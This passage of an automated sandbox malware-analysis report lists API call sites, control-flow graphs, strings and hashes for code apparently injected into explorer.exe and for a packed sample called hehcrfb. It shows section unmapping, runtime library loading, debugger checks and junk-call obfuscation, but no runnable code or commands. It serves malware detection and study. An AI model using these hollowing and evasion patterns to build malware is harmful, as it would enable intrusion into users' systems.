                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(00AD582C), ref: 00AD1839
                                                                                                                                                                • lstrlenW.KERNEL32 ref: 00AD1845
                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(00AD582C), ref: 00AD18A9
                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 00AD18B4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2134730579-0
                                                                                                                                                                • Opcode ID: 11a740ba562a94ea5f6d14440b941f04920e8ed67ae9cf3ad9dbc083491dfd5d
                                                                                                                                                                • Instruction ID: d512b7cc58488b51ed9b011c8407d2d3e25fcf822daf32756b582f093e19bd26
                                                                                                                                                                • Opcode Fuzzy Hash: 11a740ba562a94ea5f6d14440b941f04920e8ed67ae9cf3ad9dbc083491dfd5d
                                                                                                                                                                • Instruction Fuzzy Hash: AE016271E12500AFD724E7F5EE5AA6E3BA9EB51740714402BF407C7361DA349E02EBA2
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,00AD11DD), ref: 00AD26DB
                                                                                                                                                                • IsWow64Process.KERNEL32(000000FF,?), ref: 00AD26ED
                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?), ref: 00AD2700
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD2716
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 331459951-0
                                                                                                                                                                • Opcode ID: c49f783264effb35a44252a9d69e5644785625e7b994c750a478aaa920547c6e
                                                                                                                                                                • Instruction ID: f9033837e4f6e5f3f9b94bc64a9eb0cc4b3e4754d40fcab41cb8ec56cd6f3d13
                                                                                                                                                                • Opcode Fuzzy Hash: c49f783264effb35a44252a9d69e5644785625e7b994c750a478aaa920547c6e
                                                                                                                                                                • Instruction Fuzzy Hash: 62F03076902219FF9B21CFE09D489BEB7BCEE05255B14127BE91693240E7314F01D7A1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                  • Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                • GetLocalTime.KERNEL32(?,00000000), ref: 00AD17F3
                                                                                                                                                                • wsprintfW.USER32 ref: 00AD181D
                                                                                                                                                                Strings
                                                                                                                                                                • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00AD1817
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                                                • API String ID: 377395780-613334611
                                                                                                                                                                • Opcode ID: 57c814209ac5a04cab4f18ce533f7caee386d6654f3633c4c2fc01d5c24c69a0
                                                                                                                                                                • Instruction ID: b95a17f3b50ce2723af5cee88368fd26232b5c08131ac05f8d082000827eeea8
                                                                                                                                                                • Opcode Fuzzy Hash: 57c814209ac5a04cab4f18ce533f7caee386d6654f3633c4c2fc01d5c24c69a0
                                                                                                                                                                • Instruction Fuzzy Hash: 44F03766900128BA8B1497D99D059FFB3FCEB0C702B00015BFA52D1180E6785A50D3B5

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_00E041E0 1 Function_00E0AFE3 2 Function_00E041E4 3 Function_00E0A8E8 4 Function_00E018E8 5 Function_00E0ADEA 6 Function_00E040EC 7 Function_00E041F0 8 Function_00E020F4 11 Function_00E018F8 8->11 23 Function_00E018D0 8->23 29 Function_00E01FDC 8->29 38 Function_00E020AC 8->38 45 Function_00E019BC 8->45 54 Function_00E0188C 8->54 64 Function_00E01860 8->64 91 Function_00E01838 8->91 105 Function_00E01F0C 8->105 9 Function_00E0AFF6 10 Function_00E01BF8 12 Function_00E026F8 49 Function_00E02580 12->49 66 Function_00E02664 12->66 71 Function_00E01C6C 12->71 13 Function_00E01EF8 14 Function_00E041F8 15 Function_00E014F9 16 Function_00E01EFA 17 Function_00E0C0FC 18 Function_00E02DC0 18->91 19 Function_00E034C4 19->10 37 Function_00E01CAC 19->37 19->45 52 Function_00E01A88 19->52 58 Function_00E03394 19->58 19->64 19->71 76 Function_00E01C4C 19->76 86 Function_00E01D24 19->86 19->91 98 Function_00E01D04 19->98 99 Function_00E02A04 19->99 20 Function_00E027C4 21 Function_00E040CC 22 Function_00E0ABCF 24 Function_00E0AAD2 25 Function_00E014D4 26 Function_00E040D4 27 Function_00E0ABD7 28 Function_00E041DA 29->11 29->91 30 Function_00E040DC 31 Function_00E0B2DF 32 Function_00E027A0 33 Function_00E040A4 34 Function_00E041A4 35 Function_00E0B4A8 69 Function_00E0B46A 35->69 36 Function_00E025A8 36->23 36->49 67 Function_00E02768 36->67 38->52 39 Function_00E031AC 39->12 39->36 39->64 78 Function_00E01D54 39->78 39->91 107 Function_00E01B10 39->107 40 Function_00E040AC 41 Function_00E0AAB0 42 Function_00E014B2 43 Function_00E040B4 44 Function_00E024B8 44->8 44->64 44->91 46 Function_00E02FBC 88 Function_00E02E2C 46->88 47 Function_00E041BC 48 Function_00E0B2BE 48->35 50 Function_00E0A881 51 Function_00E04084 53 Function_00E05289 54->91 55 Function_00E0408C 56 Function_00E0AC8D 57 Function_00E0B291 58->4 58->13 58->23 58->52 60 Function_00E01E9C 58->60 58->64 58->91 59 Function_00E0AB9C 61 Function_00E0409C 62 Function_00E0419C 63 Function_00E01560 64->71 65 Function_00E04064 67->32 68 Function_00E03068 68->64 68->71 68->88 90 Function_00E01938 68->90 68->91 70 Function_00E0156C 72 Function_00E01576 73 Function_00E05579 74 Function_00E0407C 75 Function_00E0B148 77 Function_00E01254 79 Function_00E04154 80 Function_00E0B358 80->35 81 Function_00E03158 82 Function_00E04259 83 Function_00E0B15B 84 Function_00E0415C 85 Function_00E01822 87 Function_00E04124 88->18 88->54 88->64 89 Function_00E0412C 90->64 90->91 92 Function_00E0413C 93 Function_00E01F00 94 Function_00E0AD00 95 Function_00E01000 96 Function_00E04001 97 Function_00E0C104 99->20 99->71 111 Function_00E02918 99->111 100 Function_00E01405 101 Function_00E0B007 102 Function_00E01508 103 Function_00E0C00C 104 Function_00E0370C 104->19 104->39 104->71 104->91 104->104 106 Function_00E0410C 108 Function_00E02D14 108->4 108->44 108->64 108->91 112 Function_00E01E1C 108->112 109 Function_00E04114 110 Function_00E04817 112->91 113 Function_00E0411C 114 Function_00E0141D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 116 e0370c-e0371c call e01c6c 119 e037b0-e037b5 116->119 120 e03722-e03754 call e01838 116->120 124 e03785-e037aa NtUnmapViewOfSection 120->124 125 e03756-e0375b call e01838 120->125 129 e037bc-e037cb call e034c4 124->129 130 e037ac-e037ae 124->130 127 e03760-e03779 125->127 127->124 136 e037d5-e037de 129->136 137 e037cd-e037d0 call e0370c 129->137 130->119 131 e037b6-e037bb call e031ac 130->131 131->129 137->136
                                                                                                                                                                APIs
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL ref: 00E0378C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_17_2_e01000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SectionUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 498011366-0
                                                                                                                                                                • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                • Instruction ID: 1667494eab80e3b374471fe928cb69fd41e09cdfa2eb5a3ea4a402e1e6f0a319
                                                                                                                                                                • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                • Instruction Fuzzy Hash: 5711B6746019094BFB5CFBB8989D37633E5E718312F58506AA815C76E2DE398AC18700

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 e0b4a8-e0b4ab 1 e0b4b5-e0b4b9 0->1 2 e0b4c5 1->2 3 e0b4bb-e0b4c3 1->3 4 e0b4c7 2->4 5 e0b4ad-e0b4b3 2->5 3->2 6 e0b4ca-e0b4d1 4->6 5->1 8 e0b4d3-e0b4db 6->8 9 e0b4dd 6->9 8->9 9->6 10 e0b4df-e0b4e2 9->10 11 e0b4e4-e0b4f2 10->11 12 e0b4f7-e0b504 10->12 13 e0b4f4-e0b4f5 11->13 14 e0b52e-e0b549 11->14 22 e0b506-e0b508 12->22 23 e0b51e-e0b52c call e0b46a 12->23 13->12 15 e0b57a-e0b57d 14->15 17 e0b582-e0b589 15->17 18 e0b57f-e0b580 15->18 21 e0b58f-e0b593 17->21 20 e0b561-e0b565 18->20 24 e0b567-e0b56a 20->24 25 e0b54b-e0b54e 20->25 26 e0b5f0-e0b5f9 21->26 27 e0b595-e0b5ae LoadLibraryA 21->27 29 e0b50b-e0b512 22->29 23->1 24->17 30 e0b56c-e0b570 24->30 25->17 28 e0b550 25->28 31 e0b5fc-e0b605 26->31 33 e0b5af-e0b5b6 27->33 35 e0b551-e0b555 28->35 49 e0b514-e0b51a 29->49 50 e0b51c 29->50 30->35 36 e0b572-e0b579 30->36 37 e0b607-e0b609 31->37 38 e0b62a-e0b67a VirtualProtect * 2 31->38 33->21 34 e0b5b8 33->34 40 e0b5c4-e0b5cc 34->40 41 e0b5ba-e0b5c2 34->41 35->20 42 e0b557-e0b559 35->42 36->15 44 e0b60b-e0b61a 37->44 45 e0b61c-e0b628 37->45 46 e0b67e-e0b683 38->46 47 e0b5ce-e0b5da 40->47 41->47 42->20 48 e0b55b-e0b55f 42->48 44->31 45->44 46->46 51 e0b685-e0b694 46->51 54 e0b5e5-e0b5ef 47->54 55 e0b5dc-e0b5e3 47->55 48->20 48->24 49->50 50->23 50->29 55->33
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00E0B5A7
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00E0B651
                                                                                                                                                                • VirtualProtect.KERNELBASE ref: 00E0B66F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000011.00000002.3873276692.0000000000E0A000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_17_2_e0a000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                • Instruction ID: 455f310c238ced8171cbb5c9c32dd078e9a1fb1256885cf2e1a28caac3b06082
                                                                                                                                                                • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                • Instruction Fuzzy Hash: FC518A31754D1E4BCB24AB789CC02F4B3C2F755329B1816AAC49AE32C5E759C9C68381

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00E01BF8: OpenFileMappingA.KERNEL32 ref: 00E01C0F
                                                                                                                                                                  • Part of subcall function 00E01BF8: MapViewOfFile.KERNELBASE ref: 00E01C2E
                                                                                                                                                                • SysFreeMap.PGOCR ref: 00E036F7
                                                                                                                                                                • SleepEx.KERNELBASE ref: 00E03701
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_17_2_e01000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$FreeMappingOpenSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4205437007-0
                                                                                                                                                                • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                • Instruction ID: 02b186db45fcb89b5a128319fdd342c51e028a70ac1ea11a43d96ea4c848f749
                                                                                                                                                                • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                • Instruction Fuzzy Hash: 9851F630218A088FDB09FF38D8996BA73E6EB95304F44565DE44BD72E1DF38EA458781

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 113 e01bf8-e01c18 OpenFileMappingA 114 e01c1a-e01c38 MapViewOfFile 113->114 115 e01c3b-e01c48 113->115 114->115
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_17_2_e01000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$MappingOpenView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3439327939-0
                                                                                                                                                                • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                • Instruction ID: 0d32a82cc5a1697248c525d8ab4b1903168984787318f7122b1880b7721a8faa
                                                                                                                                                                • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                • Instruction Fuzzy Hash: 61F0FE34314E494FAB49EF7C989C125B7E1EBA8206744857A985AC6165EF34C8858711

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 401681-4016a3 HeapCreate 1 4016a5-4016a6 0->1 2 4016a7-4016b0 0->2
                                                                                                                                                                APIs
                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00401696
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                • Opcode ID: 303771f023d4e94bce52889dc268f844609580f8124493d745e7c6b152ca6148
                                                                                                                                                                • Instruction ID: cb7014ea4a2fde73be17652fedec27c9feeca99d45f78c766f4f7c6d4be00a19
                                                                                                                                                                • Opcode Fuzzy Hash: 303771f023d4e94bce52889dc268f844609580f8124493d745e7c6b152ca6148
                                                                                                                                                                • Instruction Fuzzy Hash: AFD05E769503455FDB009F717C08BA63BDCA784795F048836B81DC6290E67AC5509A48

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 68 418c80-418ca8 call 409710 71 418cb0-418cb7 68->71 72 418ce4-418cea 71->72 73 418cb9-418ce2 GetVolumeInformationA 71->73 74 418cec-418cf8 72->74 75 418cfe-418d08 72->75 73->72 74->75 76 418d43-418d4a 75->76 77 418d0a-418d39 WriteConsoleOutputAttribute 75->77 76->71 78 418d50-418d56 76->78 77->76 79 418d58-418d5e 78->79 80 418d60-418d66 79->80 81 418d6c-418d76 79->81 80->81 82 418d78 GetCommandLineW 81->82 83 418d7a-418d81 81->83 82->83 83->79 84 418d83-418d8a 83->84 85 418d90-418eb3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW call 4058c0 GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 84->85 86 418ee3-418eef 84->86 94 418ec1-418ec8 85->94 95 418eb5-418ebb ObjectPrivilegeAuditAlarmA 85->95 88 418ef1-418eff SetCommMask GetLastError 86->88 90 418f11-418f17 88->90 91 418f01-418f0b GetUserObjectInformationW 88->91 92 418f22-418f29 90->92 93 418f19-418f20 90->93 91->90 96 418f2b-418f9a GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryTypeA PurgeComm call 40109d call 40100f * 2 call 40109d call 40100f call 401204 92->96 97 418f9d-418fac call 418910 92->97 93->88 93->92 98 418ed2-418ee0 call 40121b call 401363 94->98 99 418eca-418ecc WaitForSingleObject 94->99 95->94 96->97 106 418fdd-418ffe LoadLibraryA call 418940 call 418be0 97->106 107 418fae-418fbf 97->107 98->86 99->98 123 419000-419007 106->123 110 418fc0-418fd0 107->110 114 418fd2 110->114 115 418fd8-418fdb 110->115 114->115 115->106 115->110 125 419009-419017 GlobalAlloc GetStdHandle MoveFileW 123->125 126 41901d-419023 123->126 125->126 128 419025 call 418930 126->128 129 41902a-419031 126->129 128->129 131 419033-41903e InterlockedCompareExchange 129->131 132 419044-41904b 129->132 131->132 132->123 134 41904d-41905d 132->134 136 419060-419070 134->136 137 419072-419077 GetFileAttributesA 136->137 138 419079-41907c 136->138 137->138 138->136 139 41907e-419089 138->139 140 419090-419095 139->140 141 419097-41909d 140->141 142 41909f-4190a5 140->142 141->142 143 4190a7-4190b4 call 401000 141->143 142->140 142->143
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00418CE2
                                                                                                                                                                • WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00418D2D
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 00418D78
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418DA4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418DB6
                                                                                                                                                                • SearchPathA.KERNEL32(wapopasihe,nemagutimebonefotekoneb,bopuwofebakuduwin,00000000,?,?), ref: 00418DDA
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
                                                                                                                                                                • _memset.LIBCMT ref: 00418E10
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418E49
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
                                                                                                                                                                • SetCommMask.KERNEL32(00000000,00000000), ref: 00418EF5
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00418EF7
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
                                                                                                                                                                • GetBinaryTypeA.KERNEL32(bahujijudunogikawatihohelujof,?), ref: 00418F66
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
                                                                                                                                                                • _calloc.LIBCMT ref: 00418F76
                                                                                                                                                                • _calloc.LIBCMT ref: 00418F89
                                                                                                                                                                • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00418FE2
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041900D
                                                                                                                                                                • GetStdHandle.KERNEL32(00000000), ref: 00419011
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E
                                                                                                                                                                • GetFileAttributesA.KERNEL32(mufolomeragakowubicigero), ref: 00419077
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$File$CommObject$CompareExchangeInformationInterlockedLengthNameOutputPathSearchWrite_calloc$AdjustmentAlarmAliasAliasesAllocAtomAttributeAttributesAuditBinaryCommandComputerConfigCopyCreateDefaultEnvironmentErrorExesFindFocusGlobalHandleLastLibraryLineLoadMaskModeModuleMovePipePrivilegePurgeReadSingleStringsSystemTimeTypeUserVolumeWait_memset
                                                                                                                                                                • String ID: bahujijudunogikawatihohelujof$bopuwofebakuduwin$k`$msimg32.dll$mufolomeragakowubicigero$nemagutimebonefotekoneb$wapopasihe$}$
                                                                                                                                                                • API String ID: 2037564194-3937991245
                                                                                                                                                                • Opcode ID: 1067e03fbf93e69b4f39a2358ec748eff479c0dd2fe9ee59bcb20172be9e4c49
                                                                                                                                                                • Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
                                                                                                                                                                • Opcode Fuzzy Hash: 1067e03fbf93e69b4f39a2358ec748eff479c0dd2fe9ee59bcb20172be9e4c49
                                                                                                                                                                • Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 004015E1
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004015F6
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(PA), ref: 00401601
                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040161D
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00401624
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                • String ID: PA
                                                                                                                                                                • API String ID: 2579439406-4003426662
                                                                                                                                                                • Opcode ID: 08e894e7397114792053717ef5d1d8be5021fb45822fe29cacdd0d0ec7153051
                                                                                                                                                                • Instruction ID: a9805fc8b09d2057952d5a0785da509dc7222d8bc85e00f1d12cc36ee1d3e06d
                                                                                                                                                                • Opcode Fuzzy Hash: 08e894e7397114792053717ef5d1d8be5021fb45822fe29cacdd0d0ec7153051
                                                                                                                                                                • Instruction Fuzzy Hash: 3421CDBC902204DFE711EF2AED486C47BE4FB08314F04997AE908972A0E7749985CF1E
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000047AC), ref: 004047F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                • Opcode ID: 082e7bc162a6d56d77b311cfc5dd17085e16372c2f7f22f823c548adfaf14cf6
                                                                                                                                                                • Instruction ID: 3efac7d686926e2f480a98521f12a7af5aac45af82772df426a3cb1b688467d9
                                                                                                                                                                • Opcode Fuzzy Hash: 082e7bc162a6d56d77b311cfc5dd17085e16372c2f7f22f823c548adfaf14cf6
                                                                                                                                                                • Instruction Fuzzy Hash: 589002E42531049A87021BB05C1954529905ACD6227A144B1E105D60D8DB684168551E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 146 418b20-418b2c 147 418b3c-418b42 146->147 148 418b2e-418b3a BuildCommDCBA 146->148 149 418b4c-418b51 147->149 150 418b44-418b46 FreeEnvironmentStringsA 147->150 148->149 151 418b53-418b54 149->151 152 418bbc-418bc0 149->152 150->149 153 418b60-418b7b call 418b10 151->153 154 418bc2-418bcc 152->154 155 418bd6-418bd9 152->155 158 418bb6-418bb9 153->158 159 418b7d-418bb0 GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 153->159 154->155 158->153 160 418bbb 158->160 159->158 160->152
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
